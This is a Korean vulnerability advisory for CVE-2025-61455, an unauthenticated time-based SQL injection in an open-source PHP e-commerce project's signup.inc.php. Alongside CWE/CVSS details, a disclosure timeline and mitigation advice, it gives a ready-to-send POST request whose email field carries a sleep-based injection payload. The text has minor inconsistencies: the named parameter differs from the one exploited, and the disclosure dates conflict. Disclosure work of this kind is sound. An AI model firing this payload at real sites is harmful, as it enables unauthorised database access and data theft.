
CVE-2025-61455에 대한 공개 공개 및 개념 증명(PoC) 자료로, E-commerce Project v1.0의 치명적인 SQL 인젝션 취약점에 대한 기술적 세부 사항, PoC, 및 완화 권장 사항을 포함합니다.
공개 날짜: 2025년 10월 14일
CVE ID: CVE-2025-61455
심각도: CRITICAL (CVSS 9.8)
E-commerce Project v1.0의 signup.inc.php 엔드포인트에 치명적인 SQL 인젝션 취약점이 존재합니다. 이 애플리케이션은 검증되지 않은 사용자 입력을 SQL 쿼리에 직접 포함하여, 인증되지 않은 공격자가 인증을 우회하고 임의의 SQL 명령을 실행할 수 있게 합니다.
이 문제에는 CVE-2025-61455 식별자가 할당되었습니다. 공개 당시 공식 패치는 제공되지 않았습니다.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.php이 애플리케이션은 입력 검증이나 준비된 문(prepared statements) 없이 검증되지 않은 입력을 SQL 쿼리에 직접 사용합니다. 취약점은 signup.inc.php 파일의 aid 매개변수에 존재합니다.
공격자는 이메일 매개변수를 통해 악성 SQL 코드를 주입하여 시간 기반 블라인드 SQL 인젝션 공격을 수행할 수 있습니다.
취약한 코드 패턴 예시:
$query = "SELECT * FROM table WHERE email='$email'";
이로 인해 쿼리 로직을 조작하고 민감한 데이터를 추출할 수 있는 인젝션 페이로드가 가능해집니다.
| CWE ID | 제목 |
|---|---|
| CWE-89 | SQL 명령에 사용되는 특수 요소의 부적절한 중화 |
| 점수 | 심각도 | 벡터 문자열 |
|---|---|---|
| 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
성공적인 악용 시 다음과 같은 결과가 발생할 수 있습니다:
git clone https://github.com/Bhabishya-123/E-commerce.git
XAMPP/LAMP를 사용하여 프로젝트를 배포하고 다음으로 이동합니다:
http://localhost/e-commerce-main/includes/signup.inc.php
다음 악성 HTTP 요청을 전송합니다:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
설명:
이메일 매개변수에는 시간 기반 SQL 인젝션 페이로드가 포함되어 있습니다: '+(select*from(select(sleep(20)))a)+'
애플리케이션이 응답하기 전에 20초 동안 지연되면 SQL 인젝션이 성공한 것입니다.
mysqli_prepare() 또는 PDO)으로 대체하세요.| 이벤트 | 날짜 |
|---|---|
| 취약점 발견 | 2025년 9월 16일 |
| 공개 공개 | 2025년 10월 13일 |
| 패치 제공 | ❌ 공개 시점 기준 제공되지 않음 |
이 취약점은 다음에 의해 발견되어 책임감 있게 공개되었습니다:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 공급업체의 응답이 없어 이 권고는 독립적으로 게시되었습니다.